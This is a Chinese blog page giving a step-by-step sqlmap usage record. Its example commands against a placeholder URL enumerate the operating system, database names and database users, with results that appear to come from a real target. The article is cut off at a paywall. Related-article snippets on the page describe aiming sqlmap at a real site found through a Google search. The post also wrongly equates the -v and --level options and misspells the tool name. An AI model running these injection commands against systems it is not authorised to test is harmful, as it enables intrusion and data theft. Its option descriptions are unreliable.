SQLmap实战记录

最新推荐文章于 2024-06-03 17:36:29 发布
最新推荐文章于 2024-06-03 17:36:29 发布
阅读量1.2w 收藏 8
点赞数
分类专栏: Linux|Back track 文章标签: 数据库 database url 破解 table application
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gmnet/article/details/7894834
版权

【-u/--url="url"】 #后面接目标网址,表示测试的目标地址。
【-v/--level=number】 #number=[0-5],表示测试结果的详细程度。数值越大,内容越详细。

sqlmap.py -u “url”  -v 0-5
或
sqlmap.py --url="url" --level=0-5


通过以上参数,会得到:
1、目标的操作系统信息
2、数据库的类型[MySQL/MSSQL/Access]、版本号
3、Web服务器版本、版本号
4、支持的脚本类型

Example:

sqlmap.py --url="http://www.xxxx.com/index.php?ID=111" --level=1
sqlmap.py -u "http://www.xxxx.com/index.php?ID=111" --v 1

Result:

web server operating system: Linux Red Hat Enterprise 3 (Taroon)
web application technology: PHP 4.3.2, Apache 2.0.46
back-end DBMS: MySQL 4


【--current-db】 #表示获取当前数据库的名称。但实测中对Access的数据库不能获得数据库名称

sqlmay.py --url="url" --current-db


通过以上参数,会得到:
1、当前所用的数据库的名称

Example:

sqlmap.py --url="http://www.xxxx.com/index.php?ID=111" --current-db

Result:

current database:    'greenbergdevDB'



【--dbs】#列举所有的数据库名单。我这里只列出来一个。可能是因为权限的问题。

sqlmap.py --url="url" --dbs


 

Exampl:

sqlmap.py --url="http://www.xxxx.com/index.php?ID=111" --dbs --level=1

Result:

available databases [1]:
[*] greenbergdevDB


【--current-user】 #表示获取当前数据库的用户名

sqlmap.py --url="url" --current-user


通过以上参数,会得到:
1、当前数据库的用户名

Example:

sqlmap.py --url="http://www.xxxx.com/index.php?ID=111" --current-user --level

Result:

current user:    'greenbergUser@localhost'


【--users】 #表示枚举数据库所有用户名称。但在我实测过程中什么都没枚举出来。可能是权限不够。

sqlmap.py --url="url" --users<
最低0.47元/天 解锁文章
eudemon_cn
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入漏洞--sqlmap使用
qq_43710889的博客
06-16 2537
文章目录sql注入漏洞--sqlmap使用基本流程:实战get请求命令:`python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --users`命令:`python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs`命令:`python sqlmap.py -u "http://testphp.vulnweb.com/artists.p
sql注入进阶--跑向mysql
jiangliuzheng的专栏
07-11 7931
1、之前也是google关键字搜索,找到了一个相对有点难度的网站http://www.konzern.com.cn/about/index.php?id=2 2、测试什么的就不用说了,直接sqlmap跑起来。 (1)先看看是什么数据库吧,废话,不是已经剧透了吗。 c:\Python27\sqlmap>sqlmap.py -u http://www.konzern.com.cn/a
记录一次SQL注入src挖掘过程
m0_62584974的博客
09-29 835
记录挖洞小白的一次SQL注入挖洞经历
sql注入 (运用sqlmap解题)
最新发布
Z11762的博客
06-03 2002
注:level参数使用–batch参数可指定payload测试复杂等级。共有五个级别,从1-5,默认值为1。等级越高,测试的payload越复杂,当使用默认等级注入不出来时,可以尝试使用–level来提高测试等级。--level参数决定了 sqlmap 在检测 SQL 注入时的 “努力程度”。
SQL注入之SQLmap入门
Shellcode.Cool!
04-18 882
什么是SQLmapSQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。 读者可以通过位于SourceForge的官方网站下载SQLmap源码:http://sourceforge.net/projects/sqlmap/和http://sqlmap.org/ SQLmap的作者是谁
sqlmap使用
m0_46617336的博客
10-05 6084
渗透测试工具之sqlmap——简单应用渗透测试工具之sqlmap工具介绍应用环境整型溢出判断是否存在注入爆出数据库爆表名爆列名取值总结 渗透测试工具之sqlmap 工具介绍 一款开源的SQL注入工具,适用于win和kali(本文使用debian)。现在使用最新版sqlmap,通过安装可以实现在Python3的环境里运行。 应用环境 CTFHub平台中的SQL注入相关题目 链接:https://www.ctfhub.com 整型溢出 判断是否存在注入 sqlmap -u http://challenge-4d
sqlmap 用法
安全小站
09-20 3095
sqlmap用法 【-u/--url="url"】 #后面接目标网址,表示测试的目标地址。 【-v/--level=number】 #number=[0-5],表示测试结果的详细程度。数值越大,内容越详细。 sqlmap.py -u “url”  -v 0-5 或 sqlmap.py --url="url" --level=0-5 通过以上参数,会得到: 1、目标的操作系统信
SQLMAP系列课程视频.rar
11-13
9. **实战案例**:课程可能包含实际的渗透测试场景,展示如何在安全环境中应用SQLMAP发现和利用SQL注入漏洞。 10. **防御策略**:虽然主要讲解攻击工具,但也会提及防御SQL注入的措施,比如使用预编译语句、输入...
sqlmap使用手册
12-11
3. **实战演练**: 使用SQLMap对模拟环境或已知存在注入漏洞的靶机进行实战操作,练习探测、数据抽取和权限升级等。 4. **分析输出**: 分析SQLMap的输出结果,理解其如何判断注入点,以及如何进行下一步操作。 5. *...
使用sqlmap+burpsuite进行中级sql注入
06-01
本篇将详细介绍如何结合sqlmap和BurpSuite工具进行中级SQL注入的实战操作。 首先,我们需要了解sqlmap和BurpSuite的基本功能。sqlmap是一款自动化SQL注入工具,它能自动检测和利用SQL注入漏洞,获取数据库信息。...
sqlmap使用手册集合
06-10
2. 数据篡改:使用`--update`参数,可以直接修改数据库中的记录。 3. 文件系统访问:在某些情况下,SQLMap可以读取服务器文件系统,甚至执行远程命令。 七、防护与防御 1. 输入验证:对用户输入进行严格的过滤和...
iBATIS实战
11-13
5.3.2 更新或删除子记录 89 5.4 运行批量更新 90 5.5 使用存储过程 91 5.5.1 优缺点分析 92 5.5.2 IN、OUT和INOUT参数 93 5.6 小结 95 第6章 使用高级查询技术 96 6.1 在iBATIS中使用XML 96 6.1.1 XML参数 96 6.1.2...
解决powerDesinger12逆向工程报错:Unable to list the tables
03-23 227
用PowerDesigner12利用ODBC连接SQL2005进行反向工程时,报下面的错误:    ---------------------------      PowerDesigner - Error    ---------------------------      Unable to list the tables.      [Microsoft][ODBC SQL S
简单的sql注入之2WP
热门推荐
Yale的博客
03-19 1万+
这里我们会用到tamper,是python写的,sqlmap一般自带,主要的作用是绕过WAF 空格被过滤可以使用space2comment.py,过滤系统对大小写敏感可以使用randomcase.py等等流程和简单的sql注入之3是一样的,不过加了–tamper而已 就不截图了,以下是我从KALI的终端上复制的 这里用的level参数是执行测试的等级(1-5,默认为1) sqlmap默认测
greenplum全量恢复gprecoverseg -F出现Unable to connect to database时的相关分析及解决方法
aabc012的博客
07-28 1万+
之前有两位朋友碰到过在对greenplum的系统构架更改后,出现全量恢复gprecoverseg -F也无法正常运行的情况。 报错信息为Unable to connect to database. Retrying 1 gprecoverseg failed. (Reason='Unable to connect to database and start transaction') exiting... 有幸拷得一份虚拟机上的全部文件,对其进行分析。 发现其实出现这个问题只需要修改pg_changetra
在PowerDesigner12 逆向工程DataBase SQl时出现:unable to list the tables 信息
编程开发资料库
07-26 164
在PowerDesigner12 逆向工程DataBase SQl2005时出现:unable to list the tables 信息 此时应该设置sqlserver2005数据库的行为设置为指定Sql server版本兼容: 执行:EXEC sp_dbcmptlevel 'dbname', '90'; GO sp_dbcmptlevel (Transact-SQL):将...
Unable to connect to database server to retrieve database list; Arcgis 连接不上postsql库;
weixin_30401605的博客
01-21 1020
在C:\Program Files (x86)\ArcGIS\Desktop10.2\bin 目录下添加 pg依赖的插件 插件下载地址: 转载于:https://www.cnblogs.com/liuyongpingblog/p/10299712.html
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值